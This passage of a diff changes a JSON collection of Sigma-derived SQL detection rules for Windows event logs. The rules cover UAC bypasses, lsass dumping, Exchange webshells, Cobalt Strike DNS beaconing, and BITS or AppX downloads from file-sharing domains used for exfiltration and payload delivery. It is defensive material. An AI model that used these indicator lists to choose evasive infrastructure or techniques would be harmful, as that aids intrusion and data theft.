OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", - "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" - ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" - }, - { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": 